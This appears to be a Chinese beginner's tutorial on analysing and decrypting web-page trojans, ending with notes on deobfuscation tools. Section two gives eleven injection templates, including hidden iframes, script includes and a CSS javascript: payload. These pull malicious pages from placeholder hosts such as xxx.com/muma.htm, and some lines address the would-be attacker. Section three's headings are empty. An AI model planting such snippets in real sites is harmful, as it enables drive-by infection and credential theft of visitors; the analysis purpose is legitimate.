網馬解密大講堂——網馬解密初級篇

一.  網頁掛馬的概念:

      網頁掛馬是指:在獲取網站或者網站服務器的部分或者全部權限後,在網頁文件中插入一段惡意代碼,這些惡意代碼主要是一些包括IE等漏洞利用代碼,用戶訪問被掛馬的頁面時,如果系統沒有更新惡意代碼中利用的漏洞補丁,則會執行惡意代碼程序,進行盜號等危險操作。

二.常見的網頁掛馬方式:


1.框架掛馬:
  <iframe src=http://www.xxx.com/muma.htm width=0 height=0></iframe>

2.  js文件掛馬:
  首先將以下代碼:  
document.write("<iframe width=0 height=0 src='地址'></iframe>");
保存爲xxx.js,
則JS掛馬代碼爲:
<script language=javascript src=xxx.js></script>

3. js變形加密
      <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>muma.txt可改成任意後綴

4. flash***
    http://網頁***地址 插入***地址 width=10 height=10", "GET" 寬度和高度,方式後面的照添,更改***地址就可以了。

5. 不點出現鏈接的***
<a href="http://www.163.com(迷惑的超級連接地址,顯示這個地址指向***地址)" > 頁面要顯示的內容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="你的***地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,
menubar=no,scrollbars=no,resizable=no,
copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

6.隱蔽掛馬:

top.document.body.innerHTML=top.document.body.innerHTML+'\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>'[/url]

7.css中掛馬:

body {background-p_w_picpath:url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

8.Java掛馬:

<SCRIPT language=javascript>  
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");  

9.圖片僞裝:
<html>
<iframe src="網馬地址" height=0 width=0></iframe>
<img src="圖片地址"></center>
</html>

10. 僞裝調用:
  <frameset rows="444,0" cols="*">
  <frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
  <frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">

11.高級欺騙:
<a href="http://www.163.com(迷惑連接地址,顯示這個地址指向***地址)" > 頁面要顯示的內容</a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="網馬地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>


三.常見網馬所利用的漏洞判斷方式:

1. 根據惡意網址名稱來判斷漏洞:
 



2.根據CLSID判斷漏洞:

 

常見網馬解密工具:

1.Freshow工具(作者:jimmyleo大牛)

工具簡介(摘自freshow幫助文檔):Freshow是一款腳本解密的工具,其開發的初衷是減少機械操作和簡化處理步驟,使您能專注於腳本本身。一般解密方法有手動和工具兩種,Freshow儘量使得工作在一個工具下完成,當然它還不是那麼成熟,您可以搭配其他工具來完成工作。Freshow目前具備過濾和解密功能模塊能滿足常見加密分析所需的操作。它的性能和穩定性還有最終的成果取決於您對Freshow的熟悉程度、對腳本知識的瞭解程度以及分析程度。

2.HTMLDecoder(作者:祥子大牛)
工具簡介:這是一款自動解密的工具,功能非常強大,可惜俺對它研究還是,不是很深。只用過它解密過flash網馬和pdf網馬。

3.malzilla又稱神器
工具簡介:這個工具很好很強大,freshow無法解出的網馬,使用這個工具基本都可以解出。

4.MDecoder(麥田大牛)
工具簡介(摘自麥田的博客):
1,Freshow的模仿者,使用WIN32彙編編寫。
2,支持對網馬中swf和exe的查找(不完善)。
3,支持網馬識別,可通過修改classid.ini來擴充特徵。
暫時先介紹這麼多,還有很多輔助類的工具,後續會一一介紹給大家。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章